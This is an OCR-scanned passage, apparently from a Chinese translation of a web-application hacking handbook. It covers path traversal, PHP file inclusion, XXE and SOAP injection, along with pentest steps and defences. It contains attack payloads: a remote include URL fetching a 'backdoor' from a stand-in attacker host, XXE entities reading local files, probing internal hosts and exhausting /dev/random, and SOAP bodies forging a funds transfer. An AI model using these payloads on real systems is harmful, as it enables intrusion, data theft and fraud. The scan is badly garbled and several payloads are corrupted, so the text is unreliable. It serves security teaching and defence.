滤 ， 看 是 否 可 以 利用 上 述 技巧 避 开 每 一 种 过 滤 。 

(5) 当然 ， 如 果 能 够 随意 访问 应 用 程序 ， 那 么 攻击 就 变 得 更 
加 人 简单， 因为 渗透 测试 员 可 以 系统 性 地 攻击 每 种 输入 ， 并 最 终 确定 
通过 哪些 文件 名 《如 果 有 ) 可 以 到 达 文 件 系统 。 


@ ”处理 定制 编码 

我 们 曾经 见 到 ， 应 用 程序 采用 的 文件 名 编码 方案 最 终 以 危险 的 方式 
进行 处 理 ， 模 糊 处 理 也 不 能 提供 任何 安全 保障 ， 这 时 就 会 出 现 最 为 可 怕 
的 路 径 壳 历 漏洞 。 

例如 ， 一 些 应 用 程序 具有 某 种 工作 流程 功能 ， 人 允许 用 户 上 传 与 下 载 
文件 。 执 行 上 传 操作 的 请 求 提供 一 个 文件 名 参数 ， 它 在 写 入 文件 时 易于 
受到 路 径 损 历 攻 击 。 如 果 一 个 文件 成 功 上 传 ， 那 么 应 用 程序 再 为 用 户 提 
供 一 个 下 载 URL。 这 里 有 两 点 值得 注意 。 

口 应 用 程序 核对 将 要 写 入 的 文件 是 否 已 经 存在 ， 如 果 存 在 ， 就 拒绝 
重 写 这 个 文件 。 

口 为 下 载 用 户 文 件 而 生成 的 URE 使 用 一 种 定制 模糊 处 理 方案 表示 。 
这 种 方案 似乎 是 一 种 定制 的 Base64 编 码 形式 ， 它 在 每 个 编码 文件 名 位 置 
使 用 一 组 不 同 的 字符 。 

总 的 来 说 ， 这 些 注 意 点 给 直接 利用 漏洞 设立 了 障碍 。 首 先 ， 尽 管 能 
够 在 服务 嚣 文件 系统 中 写 入 任何 文件 ， 但 攻击 者 却 无 法 重 写 任何 现 有 的 
文件 ， 而 且 ，Web 服 务 嚣 进程 拥有 的 较 低 权限 意味 着 攻击 者 不 可 能 在 任 
何 有 利 位 置 创 建新 文件 。 其 次 ， 如 果 不 对 定制 编码 进行 逆 同 工程 ， 攻 击 
者 也 不 可 能 请 求 任意 一 个 现 有 的 文件 〈 如 /etc/passwd) 。 

一 个 简单 的 实验 束 可 以 证 明 模 糊 处 理 后 的 URL 包 含 用 户 最 初 提交 的 
文件 名 字符 串 ， 如 下 所 示 。 

O test .txt 变 成 zZM1YTU4NTY2Y。 

口 fooy . ./test .txt 变 成 B1NzUvMzE02ZjQ0ONJjMzND。 


编码 后 的 URL 之 间 的 长 度 兰 异 表 明 ， 在 应 用 编码 之 前 ， 应 用 程序 并 
未 对 其 进行 路 径 规 范 化 。 这 种 行为 让 攻击 者 有 机 会 对 漏洞 加 以 利用 。 首 
先 退 过 以 下 名称 提 交 一 个 文件 ; 


wef ed eek oF ck of ea dS 


它 的 规范 化 形式 为 : 



































/tmp/foo 


因此 可 以 被 web 服务器 写 入 。 上 传 这 个 文件 将 生成 以 下 包含 模糊 处 理 文 
件 名 的 下 载 URL: 


FhwUk1rNXEFUVEJOZW1kN1RsUk5NazE2V1RKTmEFrMEdUDbXPWZWs1N1dYas51b 
要 修改 这 个 值 以 返回 文件 /etc/passwd， 只 需 从 右边 将 其 截 短 成 
FhwUk1rNXFUVEJOZW1LKN1IRsUkK5NazE2V1RKTmFrM 
果然 ， 尝 试 使 用 这 个 值 下 载 文 件 时 ， 结 果 返 回 服务 器 的 passwd 文 


件 。 这 说 明 ， 服 务 器 为 攻击 者 提供 了 足够 的 资源 ， 即 使 不 解 译 模 糊 处 理 
算法 ， 攻 击 者 也 可 以 使 用 它 的 编码 方案 编码 任意 文件 路 径 。 











Ey 





> 注解 细心 的 读者 可 能 已 经 注意 到 ， 在 上 传 的 文件 名 中 出 
现 了 一 个 多 余 的 ./.。 这 样 做 是 必要 的 ， 因 为 它 可 确保 截 短 后 的 URL 
符合 Base64 编 码 规则 ， 在 3 字 节 的 明文 边界 结束 ， 并 因此 在 4 字 节 的 
编码 文本 边界 结束 。 在 服务 器 上 解码 时 ， 从 一 个 编码 块 的 中 间 和 截取 
UREL 几 乎 肯定 会 造成 错误 。 


@ 利用 过 历 漏洞 

确定 一 个 可 向 服 务 器 文件 系统 读 取 或 写 入 任意 文件 的 路 径 吉 历 漏 润 
后 ， 渗 透 测试 员 应 当 实 施 哪 种 攻击 利用 这 些 漏洞 呢 ? 许 多 时 候 ， 在 文件 
系统 上 拥有 和 Web 服 务 器 进程 相同 的 读 取 / 写 入 权限 。 





渗透 测试 步 又 


可 以 利用 读 取 访 问 路 径 过 历 漏洞 从 包含 有 用 信息 的 服务 器 上 获 
取 有 益 的 文件 ， 或 者 帮助 优化 针对 其 他 漏洞 的 攻击 。 如 下 所 示 。 
口 操作 系统 与 应 用 程序 的 密码 文件 。 
口 服务 器 与 应 用 程序 配置 文件 ， 以 发 现 其 他 漏洞 或 优化 另 一 次 


口 可 能 含有 数据 库 证 书 的 包含 文件 ， 
口 应 用 程序 使 用 的 数据 源 ， 如 MySQL 数据 库 文件 或 XML 文 


口 服务器 可 执行 页 面 的 源 代码 ， 以 执行 代码 审查 ， 搜 索 漏 洞 
(例如 GetImage.aspx?file=GetImage.aspx) 。 
口 可 能 包含 用 户 名 和 会 话 令 牌 的 应 用 程序 日 志文 件 等 。 
如 果 发 现 一 个 允许 写 入 访问 的 路 径 过 历 漏洞 ， 那 么 渗透 测试 的 
主要 目标 应 该 是 利用 它 在 服务 器 上 执行 任意 命令 。 利 用 漏洞 实现 这 
一 目标 的 方法 包括 以 下 几 种 。 

口 在 用 户 的 局 动 文件 夹 中 创建 脚本 。 

口 当 用 户 下 一 次 连接 时 ， 修 改 in.ftpd 等 文件 执行 任意 命令 。 
回 一 个 拥有 执行 许可 的 Web 目 录 写 入 脚本 ， 从 浏览 器 调用 它 
门 。 


2. 防止 路 径 禹 历 漏洞 

迄今 为 止 ， 避 免 向 任何 文件 系统 API 传 送 用 户 提 交 的 数据 是 防止 路 
径 过 历 漏 洞 的 最 有 效 方法 。 许 多 时 候 ， 包 含 在 最 初 的 GetIfile.aspx? 
filename=keira.jpg 示 例 中 ， 应 用 程序 完全 没有 必要 实施 防御 。 因 为 大 多 
数 文件 都 没有 采用 访问 控制 ， 攻 击 者 可 将 这 些 文 件 存 入 Web 根 目录 中 ， 
再 通过 URL 直 接 访问 。 如 果 以 上 方法 行 不 通 ， 应 用 程序 可 能 会 保存 一 个 
可 由 页 面 处 理 的 便 编 码 图 像 文件 列表 ， 并 使 用 不 同 的 标识 符 《〈 如 一 个 索 
引号 ) 指定 需要 的 文件 。 任 何 包 含 无 效 标 识 符 的 请 求 都 可 能 让 到 拒绝 ， 
因为 没有 受 攻 击 面 可 供用 户 利用 ， 使 其 操纵 页 面 提供 的 文件 路 径 。 

有 时 ， 与 实现 文件 上 传 与 下 载 的 工作 流程 功能 一 样 ， 应 用 程序 可 能 
需要 允许 用 户 通过 名 称 指定 文件 ， 这 时 ， 开 发 者 可 能 采用 最 简单 的 办 
法 ， 将 用 户 提 交 的 用 户 名 传送 给 文件 系统 API， 从 而 达到 这 种 目的 。 在 








攻击 


件 。 

















ATL PDA REAP DM STR ee BY BT ith, AR oa Bo WI Le 
障碍 。 
以 下 是 一 些 可 能 有 用 的 防御 方法 ， 在 应 用 过 程 中 ， 最 好 将 它们 组 合 
在 一 起 使 用 。 
a 对 用 户 提 交 的 文件 名 进行 相关 解码 与 规范 化 之 后 ， 应 用 程序 应 检 
查 该 文件 名 是 否 包 含 路 径 裔 历 序 列 〈( 使 用 反 和 斜 线 或 和 斜 线 ) 或 空 字 节 。 如 
ee Dee er 
i aE 
口 应 用 程序 应 使 用 一 个 人 硬 编 码 的 、 允 许 访问 的 文件 类 型 列表 ， 并 拒 
绝 任何 访问 其 他 文件 类 型 的 请 求 ( 完 成 上 述 解 码 与 规范 化 之 后 〉。 
O 对 用 户 提 交 的 文件 名 进行 一 切 必要 的 过 滤 后 ， 应 用 程序 应 使 用 适 
当 的 文件 系统 API 确认 是 否 一 切 正 常 ， 以 及 使 用 该 文件 名 访问 的 文件 是 
侍 位 于 应 用 程序 指定 的 起 始 目 录 中 。 
在 Java 中 ， 可 通过 使 用 用 户 提 交 的 文件 名 示例 一 个 
java.io.File 对 象 ， 然 后 对 这 个 对 象 调用 getCanonicalPath 方 法 ， 
即 可 达到 上 述 目 的 。 如 果 这 个 方法 返回 的 字符 串 并 不 以 起 始 目 
录 的 名 称 开 头 ， 那 么 用 户 已 通过 某 种 方式 避 开 了 应 用 程序 的 输 
入 过 滤 ， 因 而 应 用 程序 应 拒绝 执行 该 请 求 。 
在 ASP.NET 中 ， 可 以 将 用 户 提 交 的 文件 名 传送 给 
System.1o.Path.GetFullPath 方 法 ， 并 对 返回 的 字符 串 执行 和 上 述 
Java 中 一 样 的 检查 ， 从 而 达到 相同 的 目的 。 
应 用 程序 可 以 使 用 一 个 chrooted 环 境 访 问 包 含 被 访问 文件 的 目录 ， 
减轻 大 多 数 路 径 授 历 漏洞 造成 的 影响 。 在 这 种 情况 下 ，chrooted 目 录 就 
好 比 是 文件 系统 根 目录 ， 任 何 试图 从 这 个 目录 同上 回 济 的 多 余人 遍历 请 求 
都 被 忽略 。 大 多 数 UNIX 平 台 都 支持 chrooted 文 件 系统 。 在 Windows 平 台 
上 ， 以 新 多 辑 驱 动 器 的 形式 安装 相关 起 始 目录 ， 并 且 使 用 相应 的 驱动 器 
ee 
二 由 
应 用 程序 应 将 其 路 径 壳 历 攻 击 防御 机 制 与 日 志和 和 警报 机 制 整合 在 一 
起 。 任 何 时 候 ， 只 要 收 到 一 个 包含 路 径 人 过 历 序列 的 请 求 ， 提 出 请 求 的 用 
户 就 可 能 心 存 恶意 ， 应 用 程序 应 在 日 志 中 进行 记录 ， 标 明 该 请 求 企 图 违 





























反 安 全 机 制 ， 并 终止 该 用 户 的 会 话 。 如 有 可 能 ， 应 冻结 该 用 户 账户 并 向 
管理 员 发 出 警报 。 








许多 脚本 语言 支持 使 用 包含 文件 (include file) 。 这 种 功能 允许 开 


发 者 把 可 重复 使 用 的 代码 插入 到 单个 的 文件 中 ， 并 在 需要 时 将 它们 包含 
在 特殊 功能 的 代码 文件 中 。 然 后 ， 包 含 文 件 中 的 代码 被 解释 ， 就 好 像 它 
插入 到 包含 指令 的 位 置 一 样 。 

1. 远程 文件 包含 

PHP 语 言 特别 容易 出 现 文 件 包含 漏 洞 ， 因 为 它 的 包含 函数 接受 远程 
文件 路 径 。 这 种 缺陷 已 经 成 为 PHP 应 用 程序 中 大 量 漏洞 的 根源 。 

以 一 个 同 不 同位 置 的 人 们 传送 各 种 内 容 的 应 用 程序 为 例 。 用 户 选 择 
他 们 的 位 置 后 ， 这 个 信息 通过 一 个 请 求 参 数 传送 给 服务 器 ， 代 人 码 如 下 : 

https://wahh-app.com/main.php?Country=US 

应 用 程序 通过 以 下 方式 处 理 Country 参 数 : 

Scountry = $_GETT*Country’ 1; 

include( Scountry . '.php' ); 

这 使 执行 环境 加 载 位 于 Web 服 务 器 文件 系统 中 的 US.php 文 件 。 然 
后 ， 这 个 文件 的 内 容 被 复制 到 main.php 文 件 中 ， 并 得 以 执行 。 

攻击 者 能 够 以 各 种 方式 利用 这 种 行为 ， 最 严重 的 情况 是 指定 一 个 外 
部 URE 作 为 包含 文件 的 位 置 。PHP 包 含 函 数 接受 这 个 位 置 作 为 输入 ， 接 
者， 执行 环境 将 获取 指定 的 文件 并 执行 其 内 容 。 因 此 ， 攻 击 者 能 够 构建 
一 个 包含 任意 复杂 内 容 的 恶意 脚本 ， 将 其 寄存 在 他 控制 的 Web 服务 器 
上 ， 并 通过 易 受 攻击 的 应 用 程序 函数 调用 它 然 后 执行 。 例 如 : 


om/main.php?Country=hctp: //wahh-attacker.com/backdcor 











2. 本 地 文件 包含 

有 时 ， 应 用 程序 根据 用 户 可 控制 的 数据 加 载 包 含 文件 ， 但 这 时 不 可 
能 给 位 于 外 部 服务 器 上 的 文件 指定 URL。 例 如 ， 如 果 用 户 可 控制 的 数据 
被 提交 给 ASP 函 数 Server.Execute， 那 么 攻击 者 就 可 以 执行 任意 一 段 ASP 
脚本 ， 只 要 这 上 段 脚本 属于 调用 这 个 函数 的 相同 应 用 程序 。 

在 这 种 情况 下 ， 攻 击 者 仍然 可 以 利用 应 用 程序 的 行为 执行 未 授权 操 


于 

口 在 服务 器 上 可 能 有 一 些 通 过 正常 途径 无 法 访问 的 文件 ， 例 如 ， 任 
何 访问 路 径 /admin 的 请 求 都 会 被 应 用 程序 实施 的 访问 控制 阻止 。 如 果 能 
够 将 敏感 功能 包含 在 一 个 授权 访问 的 页 面 中 ， 那 么 或 可 以 访问 那个 功 
HE o 

口 服务 器 上 的 一 些 静态 资源 也 受到 同样 的 保护 ， 无 法 直接 访问 。 如 
果 能 够 将 这 些 文件 动态 包含 在 其 他 应 用 程序 页 面 中 ， 那 么 执行 环境 就 会 
将 静态 资源 的 内 容 复 制 到 它 的 啊 应 中 。 











3. 碍 找 文件 包含 漏洞 

任何 用 己 提交 的 数据 项 都 可 能 引起 文件 包 仿 漏洞。 它们 经 党 出 现在 
指定 一 种 语言 或 一 个 位 置 的 请 求 参数 中 ， 也 第 第 发 生 在 以 参数 形式 传送 
服务 嚣 端 文件 名 的 情况 下 。 








渗透 测试 步 又 


要 测试 远程 文件 包含 漏洞 ， 执 行 以 下 步骤 。 

(1) 辣 每 一 个 目标 参数 提交 一 个 连接 受 控 制 的 Web 服 务 嚣 资 
E E E E earn 
请 求 。 

(2) 如 果 第 一 次 测试 失败 ， 演 试 提交 一 个 包含 不 存在 的 IP 地 
址 的 URL， 并 确定 服务 器 试图 与 这 个 地 址 建立 连接 时 是 否 出 现 超 
时 。 


(3) 如果 发 现 应 用 程序 易于 受到 远程 文件 包含 攻击 ， 与 前 面 
描述 的 动态 执行 攻击 中 一 样 ， 使 用 相关 语言 中 可 用 的 API， 构 建 一 
段 亚 意 脚本 实施 攻击 。 

相对 于 远程 文件 包含 而 言 ， 存 在 本 地 文件 包含 漏洞 的 脚本 环境 
要 更 多 一 些 。 要 测试 本 地 文件 包 合 漏洞， 执行 以 下 步骤 。 

C1) 提交 服务 器 上 一 个 已 知 可 执行 资源 的 名 称 ， 确 定 应 用 程 
序 的 行为 是 否 有 任何 变化 。 

(2) 提交 服务 器 上 一 个 已 知 静 态 资 源 的 名 称 ， 确 定 它 的 内 容 
是 否 被 复制 到 应 用 程序 的 啊 应 中 。 

(3) 如 果 应 用 程序 易于 受到 本 地 文件 包含 攻击 ， 尝 试 通过 
Web 服 务 器 访问 任何 无 法 直接 到 达 的 敏感 功能 或 资源 。 

六 (4) 测试 能 否 利用 之 前 讲 到 的 壳 历 技巧 访问 其 他 目录 中 的 文 

















10.3 ”注入 XML 解释 器 


今天 的 Web 应 用 程序 大 量 使 用 XML， 在 浏览 器 与 前 端 应 用 程序 服务 
器 之 间 传 送 的 请 求 和 响应 ， 以 及 在 后 端 应 用 程序 组 件 〈 如 SOAP 服 务 ) 
之 间 传 送 的 消息 中 都 可 以 找到 XML。 如 果 使 用 专门 设计 的 输入 破坏 应 
用 程序 的 运行 并 执行 某 些 未 授权 操作 ， 这 些 位 置 就 易于 受到 各 种 攻击 。 








在 今天 的 Web 应 用 程序 中 ，XML 常 用 于 从 客户 端 向 服务 器 提交 数 
据 。 然 后 ， 服 务 器 端 应 用 程序 将 处 理 这 些 数 据 ， 并 且 可 能 会 返回 一 个 包 
含 XML 或 任何 其 他 格式 数据 的 响应 。 在 使 用 异步 请 求 在 后 台 进 行 通信 
的 基于 Ajax 的 应 用 程序 中 ， 这 种 行为 最 为 常见 。 浏 览 絮 扩展 组 件 和 其 他 
客户 端 技 术 也 可 能 会 用 到 XML。 

以 一 个 使 用 Ajax 实 现 的 、 提 供 无 缝 用户 体验 的 搜索 功能 为 例 。 在 用 
户 输入 搜索 词 时 ， 客 户 端 脚本 将 回 服 务 器 提出 以 下 请 求 : 


POST /search/128/AjaxSearch.ashx HTTP/1.1 





Fost: mdsec.net 
Content-Type: text/xml; charset=UTF-8 


Content-Length: 44 


<Search><SearchTerm>nothing will change</SearchTerm></Search> 


服务 器 的 啊 应 如 下 所 示 无 论 啊 应 采用 什么 格式 ， 其 中 都 可 能 存在 
漏洞 ) : 


HTTP/1.1 200 OK 





Content-Type: text/xml; charset=utf-8 

Content-Length: 81 

<Search><SearchResult>No results founa for expression: nothing will 
change</SearchResult></Search> 
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如 果 遇 到 这 种 类 型 的 功能 ， 应 当 始 终 检查 其 是 否 存 在 XML 外 部 实 
体 (XXE) 注入 漏洞 。 之 所 以 会 出 现 这 种 漏洞 ， 是 因为 标准 的 XML 解 
析 库 支持 使 用 实体 引用 。 这 些 引 用 仅仅 是 在 XML 文档 内 部 或 外 部 引用 
数据 的 一 种 方法 。 通 过 阅读 本 书 的 其 他 内 容 ， 你 应 该 很 熟悉 实体 引用 。 














例如 ， 与 < 和 > 字符 对 应 的 实体 如 下 所 示 : 
elt. 
&Qt; 


XML 格式 允许 在 XML 文档 中 定义 定制 实体 。 这 些 实体 在 文档 开始 
部 分 的 可 选 DOCTYPE 元 素 中 定义 。 例 如 : 


<!DOCTYPE foo [ <!ENTITY testref “testrefvalue" > ]> 


如 果 文 档 中 包含 以 上 定义 ， 解 析 器 将 用 testrefvalue 这 个 已 定义 的 值 
替代 文档 中 出 现 的 任何 &testref; 实 体 引用 。 

此 外 ，XML 规 范 允 许 使 用 外 部 引用 来 定义 实体 ，XML 解 析 器 将 动 
态 提取 这 些 实体 的 值 。 这 些 外 部 实体 定义 采用 URL 格 式 ， 并 可 以 引用 外 
部 Web URL 或 本 地 文件 系统 上 的 资源 。XML 人 解析 右 将 提取 指定 URL 或 
文件 的 内 容 ， 并 将 其 作为 已 定义 实体 的 值 。 如 果 应 用 程序 在 其 响应 中 返 
回 任何 使 用 外 部 定义 的 实体 的 XML 数据 ， 则 指定 文件 或 UREL 的 内 容 将 
在 该 响应 中 返回 。 

攻击 者 可 以 通过 向 XML 添加 适当 的 DOCTYPE 元 素 ， 或 通过 修改 该 
元 素 〈 如 果 它 已 经 存在 ) ， 在 基于 XML 的 请 求 中 指定 外 部 实体 。 外 部 
实体 引用 使 用 SYSTEM 关 键 字 来 指定 ， 并 使 用 URL (可 能 使 用 file: 协 
W) BEATEN. 

在 前 一 个 示例 中 ， 攻 击 者 可 以 提交 以 下 请 求 〈 该 请 求 定 义 一 个 引用 
| 











POST /search/128/AjaxSearch.ashx HTTP/1.1 

iost: mdsec.net 

Content-Type: text/xml; charset=UTF-8 

Content-Length: 115 

<!DOCTYPE foo [ ‘ENTITY xxe STEM “file:///wincdows/win.ini* > ]> 
ch> rarchTerm>&xxe archTerm></Searc 


收 到 这 个 请 求 后 XML 解析 器 将 提取 指 定 文件 的 内 容 ， 并 使 用 该 
内 容 来 蔡 代 已 定义 的 实体 引用 《攻击 者 已 在 SearchTerm 元 系 中 使 用 了 该 
实体 引用 ) 。 由 于 SearchTerm 元 素 的 值 会 在 应 用 程序 的 啊 应 中 回 显 ， 这 
会 导致 服务 器 以 该 文件 的 内 容 作 出 啊 应 ， 如 下 所 示 : 





HTTP/1.1 200 OK 
Content-Type: text/xml; charset=utf-8 
Content-Length: 556 


<Search><SearchResult>No results found for expression: ; for 16-bit app 
support 

[Fonts] 

[extensions] 

{mci extensions] 

(files) 


ae 


A yn) 
笑 试 访问 
http://mdsec.net/search/128/ 


除 使 用 旬 e: 协 议 来 指定 本 地 文件 系统 上 的 资源 外 ， 攻 击 者 还 可 以 使 
用 http: 等 协议 让 服务 器 通过 网 络 提取 资源 。 这 些 URL 可 以 指定 任意 主 
机 、 耳 地址 和 端口 。 攻 击 者 可 以 利用 它们 与 后 端 系统 上 无 法 通过 因特网 
直接 访问 的 网 络 服务 进行 交互 。 例 如 ， 以 下 攻击 尝试 连接 到 在 专用 IP 地 
址 192.168.1.1 的 端口 25 上 运行 的 邮件 服务 器 : 


<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://192.168.1.1:25" > ]> 








<Search><SearchTerm>&xxe; </SearchTerm></Search> 


通过 这 种 技巧 可 以 实施 各 种 攻击 ， 如 下 所 示 。 

口 攻击 者 可 以 将 应 用 程序 作为 代理 服务 器 使 用 ， 从 应 用 程序 能 够 访 
问 的 任何 Web 服 务 器 上 检索 敏感 内 容 ， 包 括 那 些 在 组 织 内 部 的 专用 非 路 
由 地 址 空间 运行 的 内 容 。 

口 攻 击 者 可 以 利用 后 端 Web 应 用 程序 中 的 漏 润 ， 只 要 这 些 漏洞 可 以 
通过 URL 加 以 利用 。 

口 攻击 者 可 以 通过 攻击 大 量 卫 地 址 和 端口 号 ， 对 后 端 系统 上 的 开放 
端口 进行 测试 。 在 某 些 情况 下 ， 可 以 使 用 时 间 性 差异 来 推 新 所 请 求 的 端 
口 的 状态 。 其 他 时 候 ， 应 用 程序 可 能 会 在 啊 应 中 返回 某 些 服务 的 服务 标 
题 (service banner) 。 

最 后 ， 如 果 应 用 程序 检索 外 部 实体 ， 但 并 不 在 啊 应 中 返回 该 实体 ， 
oe 以 通过 无 期 限 地 读 取 某 个 文件 流 ， 从 而 实施 拒绝 服务 攻 





<!DOCTYPE foo [ <!ENTITY xxe SYSTEM " file:///dev/random"> ]> 


10.3.2 注入 SOAP 


SOAP (Simple Object Access Protocol， 简 单 对 象 访问 协议 ) 是 一 种 
使 用 XML 格式 封装 数据 、 基 于 消息 的 通信 技术 。 各 种 在 不 同 操作 系统 
和 架构 上 运行 的 系统 也 使 用 它 来 共享 信息 和 传递 消息 。 它 主要 用 在 Web 
服务 中 ;通过 浏览 器 访问 的 web 应 用 程序 常常 使 用 SOAP 在 后 端 应 用 程 
序 组 件 之 间 进 行 通信 。 


由 不 同 计算 机 执行 单项 任务 以 提高 性 能 的 大 型 企业 应 用 程序 经 常 使 
用 SOAP。 采 用 Web 应 用 程序 作为 现 有 应 用 程序 前 端的 情况 也 经 常 可 以 
见 到 SOAP 的 身影 。 这 时 ， 应 用 程序 通常 使 用 SOAP 在 不 同 的 组 件 之 间 通 
信 ， 以 确保 模块 性 和 互 用 性 。 

由 于 XML 是 一 种 解释 型 语言 ， 因 此 ， 和 前 面 描 述 的 其 他 示例 一 
样 ，SOAP 也 易于 受到 代码 注入 攻击 。XML 元 素 通过 元 字符 <、> 和 /以 语 
法 形式 表示 。 如 果 用 户 提 交 的 数据 中 包含 这 些 字 符 ， 并 被 直接 插入 
SOAP 消 息 中 ， 攻 击 者 就 能 够 破坏 消息 的 结构 ， 进 而 破坏 应 用 程序 的 逻 
辑 或 造成 其 他 不 利 影响 。 
人 

KN: 


POST /bank/27/Default.aspx HTTP/1.0 





Hoest: mdsec.net 


Centent-Length: 65 


FromAccount=18281008sAmount=143 0&ToAccount=08447656&Submit=Submit 


在 处 理 这 个 请 求 的 过 程 中 ， 应 用 程序 在 两 个 后 端 组 件 之 间 传 送 下 面 
的 SOAP 消 息 : 
<soap: Envelope xmins:soap="http: //www.w3.orcg/2001/12/soap-envelope"> 
<soap: Rody> 
<pre:Add xmlns:pre=http://target/lists soap: encodingStyle= 
“http: //www.w3.org/2001/12/socap-encoding"> 
<Account> 
<FromAccount>18281008</FromAccount> 
<Amount> 1430</Amount> 
<ClearedPunds>Palse</ClearedPunds> 
ToAccount>08447656</ToAccount> 
</Account> 
</pre:Add> 
</soap:Body> 


注意 消息 中 的 XML 元 素 如 何 与 HTTP 请求 中 的 参数 对 应 起 来 ， 以 及 
应 用 程序 如 何 添加 ClearedFunds 元 素 。 这 时 ， 应 用 程序 逻辑 确定 账户 中 
没有 足够 的 资金 可 进行 转账 ， 并 将 这 个 元 素 〈ClearedFunds) 的 值 设 为 
False， 因 此 收 到 SOAP 消 息 的 组 件 将 拒绝 转账 。 

在 这 种 情况 下 ， 攻 击 者 可 以 通过 各 种 方法 注入 SOAP 消 息 ， 从 而 破 
坏 应 用 程序 的 逻辑 。 例 如 ， 提 交 下 面 的 请 求 会 在 最 初 的 元 系 之 前 插入 另 
外 一 个 ClearedFunds 元 素 〈 同 时 保持 SQL 语法 的 有 效 性 ) 。 如 果 应 用 程 
序 处 理 它 遇 到 的 第 一 个 ClearedFunds 元 素 ， 那 么 即使 账户 中 没有 资金 ， 
也 可 以 成 功 进行 转账 。 





ST /bank/27/Default.aspx HTTP/1.0 
ost: mdsec.net 


ontent-Length: 119 


FromAccount=18281008éAmount=1430</Amount><ClearedFuncs>True 
</ClearedPunds><Amount>143 0&ToAccount-08447656&Submit-Submit 


另 一 方面 ， 如 果 应 用 程序 处 理 它 遇 到 的 后 一 个 ClearedFunds 元 素 ， 
攻击 者 就 可 以 在 ToAccount 参 数 中 注入 一 个 类 似 的 攻击 。 

另 一 种 类 型 的 攻击 是 使 用 XML 注释 完全 删除 原始 SOAP 消 上 息 中 的 一 
个 元 素 ， 并 用 攻击 者 上 自己 设计 的 元 素 代 蔡 被 删除 的 元 素 。 例 如 ， 下 面 的 
请 求 通过 Amount 参 数 注入 一 个 ClearedFunds 元 素 ， 为 ToAccount 元 素 建 
六 一 个 起 始 标 签 ， 开 始 一 段 注释 ， 并 在 ToAccount 参 数 中 结束 注释 ， 从 
而 保持 XML 语 法 的 有 效 性 : 


POST /bank/27/Default.aspx HTTP/1. 
Host: mdsec.net 
Content-Length: 125 


FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True 


</ClearedFunds><ToAccount><! --&ToAccount=-->08447656&Submit-Submit 


另 一 种 攻击 是 答 试 在 一 个 注入 的 参数 内 完成 整个 SOAP 消 轧 ， 并 将 
消息 的 剩余 部 分 注释 掉 。 但 是 ， 由 于 没有 结束 注释 与 起 始 注释 相 匹 配 ， 
这 种 攻击 会 生成 完全 错误 的 XML 语法 ， 从 而 被 许多 XML 解析 器 拒绝 。 
这 种 攻击 并 不 能 在 所 有 XML 解析 库 中 起 作用 ， 它 只 对 定制 或 目 主 研发 
ES XML APT at ZS A 0 

POST /bank/27/Default.aspx KTTP/1.0 


Host: mdsec.net 





Content-Length: 176 


FromAccount=18281008&Amount=1430</Amount><Clearedfunds>True 
</ClearedFunds> 
<ToAccount>08447656</ToAccount></Account></pre:Add></soap: Body> 
</soap:Envelope> 


<!--&Submit=Submit 


尝试 访问 
这 个 示例 中 包含 一 个 错误 消 上 号 ， 有 助 于 对 攻击 进行 微调 : 
http://mdsec.net/bank/27/ 
下 面 的 示例 包含 同样 的 漏洞 ， 但 反馈 信息 很 少 。 由 此 可 见 ， 如 
果 错 误 消 轧 没 有 什么 提示 信息 ， 利 用 SOAP 注 入 有 多 难 ! 
http://mdsec.net/bank/18/ 
http://mdsec.net/bank/6/ 


10.3.3 ”查找 并 利用 SOAP 注 入 


SOAP 注 入 可 能 很 难 发 现 ， 因 为 随意 提交 XML 元 字符 会 破坏 SOAP 
消息 的 格式 ， 而 且 这 样 做 生成 的 错误 消息 也 极其 简单 。 但 是 ， 使 用 下 面 
的 步骤 依然 可 以 相对 可 靠 地 检测 出 SOAP 注 入 漏洞 。 


渗透 测试 步 又 


(1) 轮流 在 每 个 参数 中 提交 一 个 恶意 XML 结 束 标签 ， 如 
</foo>。 如 果 没 有 发 生 错 误 ， 那 么 输入 可 能 没有 插入 到 SOAP 消 明 
中 ， 或 者 以 某 种 方式 被 净化 了 。 

(2) 如 果 出 现 错误 ， 提 交 一 对 有 效 的 起 始 与 结束 标签 ， 如 
Se 如 果 这 对 标签 使 错误 消失 ， 那 么 应 用 程序 很 可 能 易于 
受到 攻击 。 

(3) 有 些 时 候 ， 插 入 到 XML 格式 消息 中 的 数据 随后 以 XML 格 
式 被 读 取 并 返回 给 用 户 。 如 果 修 改 的 数据 项 在 应 用 程序 的 啊 应 中 返 
回 ， 看 看 提交 任意 XML 内 容 是 否 会 以 相同 的 形式 返回 ， 或 者 已 通 
过 某 种 方式 被 规范 化 。 轮 流 提 交 下 面 两 个 值 : 

test<foo/> 

test<foo></foo> 


如 果 发 现 其 中 一 个 值 的 返回 结果 为 另 一 个 值 ， 或 者 只 返回 
test， 那 么 可 以 确信 输入 被 插入 到 了 XML 消息 中 。 

(4) 如 果 HTTP 请 求 中 包含 几 个 可 放 入 SOAP 消 肯 的 参数 ， 尝 
试 在 一 个 参数 中 插入 起 始 注 释 字 符 <!--， 在 男 一 个 参数 中 插入 结束 
注释 字符 !-->。 然 后 ， 轮 换 在 参数 中 插入 这 两 个 字符 (因为 无 法 知 
道 参数 出 现 的 顺序 ) 。 这 样 做 可 能 会 把 服务 器 SOAP 消 息 的 某 个 部 
分 作为 注释 处 理 ， 从 而 改变 应 用 程序 的 逻辑 ， 或 者 形成 一 个 可 能 造 
成 信息 泄露 的 不 同 错误 条 件 。 


如 果 SOAP 注 入 很 难 发 现 ， 就 更 难 对 其 加 以 利用 。 许 多 时 候 ， 需 要 
知道 数据 周围 的 XML 的 结构 ， 以 提 区 专门 设计 的 输入 ， 修 改 消 息 内 容 
而 不 致 破坏 它 的 结构 。 在 前 面 描述 的 所 有 测试 中 寻找 任何 揭示 SOAP 消 
奶 处 理 细 节 的 错误 消 轧 。 科 和 运 的 话 ， 一 条 详细 的 错误 消息 将 透露 SOAP 
消息 的 完整 内 容 ， 人 允许 构建 专门 设计 的 值得 找 相 关 漏 洞 。 如 果 不 够 入 
运 ， 就 只 能 纯粹 猜测 ， 这 样 攻击 成 功 的 几率 就 非常 低 。 


10.3.4 防止 SOAP 注 入 


我 们 可 以 在 用 户 提交 的 数据 被 插入 SOAP 消 息 中 的 任何 位 置 实施 边 
界 确 认 过 小 ， 以 防止 SOAP 注 入 。 需 要 进行 过 滤 的 数据 包括 用 户 在 当前 











请 求 中 直接 提交 的 数据 ， 以 及 在 前 面 的 请 求 中 已 经 存在 或 由 以 用 户 数据 
为 输入 的 其 他 处 理 过 程 生 成 的 数据 。 

